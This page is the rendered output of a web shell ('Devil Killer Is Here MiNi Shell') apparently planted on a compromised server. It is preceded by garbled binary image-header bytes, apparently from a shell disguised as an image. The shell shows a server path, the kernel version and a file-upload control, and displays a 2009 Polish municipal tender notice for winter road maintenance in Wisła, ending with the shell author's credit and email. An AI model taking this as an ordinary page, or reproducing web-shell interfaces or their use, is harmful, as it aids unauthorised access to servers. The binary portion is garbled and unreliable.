JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090907/308256-N-2009.html

<p class="kh_header"><b>Wisła: ZIMOWE  UTRZYMANIE DRÓG GMINNYCH I POWIATOWYCH W SEZONACH ZIMOWYCH 2009/2010,2010/2011,2011/2012 NA TERENIE MIASTA WISŁY</b><br>
<b>Numer ogłoszenia: 308256 - 2009; data zamieszczenia: 07.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Wisła , Plac Bogumiła Hoffa 3, 43-460 Wisła, woj. śląskie, tel. 033 855-24-25, faks 033 855-29-95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.wisla.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZIMOWE  UTRZYMANIE DRÓG GMINNYCH I POWIATOWYCH W SEZONACH ZIMOWYCH 2009/2010,2010/2011,2011/2012 NA TERENIE MIASTA WISŁY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie  obejmuje kompleksowe zimowe utrzymanie dróg gminnych i powiatowych w sezonach zimowych 2009/2010,2010/2011,2011/2012 na terenie miasta Wisły poprzez odśnieżanie i zwalczanie śliskości oraz pozimowe sprzątanie dróg po każdym sezonie zimowym.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium:
Część 1: 1500 PLN (Rejon I Obłaziec),
Część 2: 1800 PLN (Rejon II Jawornik),
Część 3: 1500 PLN (Rejon III Centrum),
Część 4: 2500 PLN (Rejon IV Centrum),
Część 5: 1500 PLN (Rejon V Głębce),
Część 6: 1500 PLN (Rejon VI Głębce),
Część 7: 1000 PLN (Rejon VII Głębce),
Część 8: 3000 PLN (Rejon VIII Nowa Osada),
Częśc 9: 3000 PLN (Rejon IX Czarne),
Część 10: 1500 PLN (Rejon X Malinka),
Część 11: 1500 PLN (Rejon XI Malinka),
Część 12: 5000 PLN (Rejon XII Drogi powiatowe)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają wymagania opisane w art.
22 ust. 1 ustawy Prawo Zamówień Publicznych (Dz.U. z 2007 r. Nr 223 poz. 1655 ze zmianami):
1. posiadają uprawnienia niezbędne do wykonania zamówienia, a w szczególności mogą prowadzić działalność
gospodarczą na terytorium Rzeczypospolitej Polskiej;
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności dysponują wymaganym
sprzętem koniecznym do realizacji przedmiotowego zamówienia, a w szczególności:
ZADANIE nr 1
- dysponują co najmniej dwoma ciągnikami o mocy
min. 70 KM każdy, dwoma pługami oraz dwoma
dmuchawami wirnikowymi.
ZADANIE nr 2
- dysponują co najmniej dwoma ciągnikami o mocy
min. 70 KM każdy, dwoma pługami oraz dwoma
dmuchawami wirnikowymi.
ZADANIE nr 3
- dysponują co najmniej dwoma ciągnikami o mocy
min. 70 KM każdy, dwoma pługami oraz dwoma
dmuchawami wirnikowymi.
ZADANIE nr 4
- dysponują co najmniej dwoma ciągnikami o mocy
min. 70 KM każdy, dwoma pługami oraz dwoma
dmuchawami wirnikowymi, zestawem ładowarki+
samochód do wywozu śniegu, sprzęt do odśnieżania
chodników oraz sprzęt do rozsypywania materiałów
uszorstniających.
ZADANIE nr 5
- dysponują co najmniej dwoma ciągnikami o mocy
min. 70 KM każdy, dwoma pługami oraz dwoma
dmuchawami wirnikowymi.
ZADANIE nr 6
- dysponują co najmniej dwoma ciągnikami o mocy
min. 70 KM każdy, dwoma pługami oraz dwoma
dmuchawami wirnikowymi.
ZADANIE nr 7
- dysponują co najmniej dwoma ciągnikami o mocy
min. 70 KM każdy, dwoma pługami oraz dwoma
dmuchawami wirnikowymi.
ZADANIE nr 8
- dysponują co najmniej dwoma ciągnikami o mocy
min. 70 KM każdy, dwoma pługami oraz dwoma
dmuchawami wirnikowymi.
ZADANIE nr 9
- dysponują co najmniej dwoma ciągnikami o mocy
min. 70 KM każdy, dwoma pługami oraz dwoma
dmuchawami wirnikowymi.
ZADANIE nr 10
- dysponują co najmniej dwoma ciągnikami o mocy
min. 70 KM każdy, dwoma pługami oraz dwoma
dmuchawami wirnikowymi.
ZADANIE nr 11
- dysponują co najmniej dwoma ciągnikami o mocy
min. 70 KM każdy, dwoma pługami oraz dwoma
dmuchawami wirnikowymi.
ZADANIE nr 12
- dysponują co najmniej 3 samochodami z pługami,
2 dmuchawy wirnikowe, sprzętem do rozsypywania
materiałów uszorstniających ( piasek , żużel) oraz
sprzętem do rozprowadzania solanki
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a w szczególności:
- dysponują środkami finansowymi o wysokości nie mniejszej niż 15.000,00 zł;
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów ustawy.
5. Przy dokonywaniu oceny spełniania warunków Zamawiający
będzie się kierował regułą zero-jedynkową, tzn. Wykonawca będzie spełniał dany warunek albo nie będzie go spełniał. 
6.Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem
Wykonawcy z postępowania, a jego oferta będzie odrzucona.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca spełnia postawione warunki
zamawiający żąda, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19.5.2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2006 r. Nr 87 poz. 605 ze zmianami), następujących dokumentów:
1. aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy
przed upływem terminu składania ofert;
2. aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu
Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne (RGŚ/MSD.3410-28/09)
lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3. aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy,
wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4. aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5. Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż
3 miesiące przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia.
6. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca bądź pisemne zobowiązanie
innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa powyżej wykonawca
wskazał narzędzia i urzadzenia, którymi będzie dysponował.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, postępuje zgodnie z §2 powołanego rozporządzenia Prezesa Rady Ministrów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.um.wisla.pl/SIWZ/odsniezanie/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego, pokój nr 206.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2009 godzina 10:00, miejsce: siedziba Zamawiającego, biuro podawcze (pokój nr 1).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rejon I Obłaziec.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. Dębowa, ul. Gahura, oś. Bucznik, oś Kiczerowska, ul. Letnia, ul. Żwirowa, ul. Cicha, ul. Ustrońska (boczny
odcinek), ul. Przemysłowa, ul. Stroma, ul. Przylesie, ul. Wiosenna, ul. Strumykowa, Bulwar Słoneczny, oś.
Tokarnia, ul. Bukowa (gminna)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rejon II Jawornik.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. Brzozowa, ul. Leśna, ul. Świerkowa- Świerkowa boczna, ul. Wańkowska, ul. J. Niemca, ul. Nowa, ul. Polna,
Soszowska, ul. Pod Beskidek, ul. Brańców, ul. Jodłowa, ul. Cieślarów, ul. Jawornik - droga powiatowa, chodnik
wzdłuż ul. Jawornik, zatoka PKS i parking w Centrum Jawornika..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rejon III Centrum.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. Kwiatowa, ul. Burschego, ul. Kuryatty, ul. Kamienny, ul. Jarzębata, ul. Partecznik, ul. Beskidzka, ul. Miła, ul.
Gimnazjalna..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Rejon IV Centrum.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bulwar Księzycowy, ul. Wodna, ul. Lipowa, oś. Zdejszy, ul. Stalmacha, ul. Towarowa, ul. B. Prusa, ul. 1 Maja,
Park Kopczyńskiego, Plac Hoffa, ul. Stellera, ul. Boczna, ul. Różana..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Rejon V Głębce.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. Brzegowa, ul. Reymonta, ul. Wspólna, ul. Siglanów, ul. Ochorowicza, ul. Sarnia, ul. Sosnowa, ul. Strażacka,
os. Skolnity, Jurzyków..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Rejon VI Głębce.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> os. Mały Stożek, os. Kobyla, ul. Spokojna, ul. Przykopa, ul. Zjazdowa, ul. Górna, ul. Głęboka, os. Mrózków, ul.
Turystyczna (boczny odcinek)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Rejin VII Głębce.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Głębce Górne, ul. Klonowa, ul. Kreta, ul. Dworcowa, ul. Kasztanowa, os. Kozińce, ul. Spacerowa (boczny
odcinek), ul. Jesionowa, ul. Krzywa, ul. Radosna, ul. Groniczek, ul. Głębce (boczne odcinki).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Rejon VIII Nowa Osada.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. Milkowska, ul. Gościejów (powiatowa i gminna), ul. Wypoczynkowa, ul. Zielona, Jasna, ul. Partyzantów,
Bielanów, Tartaczna, Torfowa, Na Groń, ul. Prosta, Łukowa, ul. Liściasta, ul. Do Potoku, Na Stoku, ul. Pod Kozińce, os. Uścieńków, ul. Krótka, ul. Sportowa, ul. Czarne (boczny odcinek)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Rejon IX Czarne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> os. Równe, Bobrów, ul. Chłopska, ul. Połomska, Biała Wisełka, ul. Jelenia, ul. Nowina, ul. Cieńków, ul.
Słoneczna, Nad Zaporą, os. Borowina, Czupel, ul. Skalna, ul. Biała Wisełka odc. do OSP wraz z chodnikami,
Plac przed OSP Wisła Czarne..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Rejon X Malinka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. Fiedorowska, ul. Malinka (boczne odcinki), ul. Kadłubowa, ul. Chałupiańska, ul. Ogródkowa, ul. Jałowcowa,
ul. Niedźwiedzia, ul. Malinczanów, ul. Kosarzyska..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Rejon XI Malinka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> os. Sadowy, ul. Rastoki (droga powiatowa) + boczne odcinki, ul. Stryczków, Plac przed OSP Malinka, ul.
Cieńkowska, ul. Kędziorowska..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Rejon XII (Drogi powiatowe).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zameczek, ul. Czarne, ul. Turystyczna, ul. Dziechcinka, ul. 11 Listopada, ul. Górnośląska, ul. Olimpijska, ul.
Konopnickiej, ul. Willowa, ul. Sztwiertni, ul. Bukowa..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com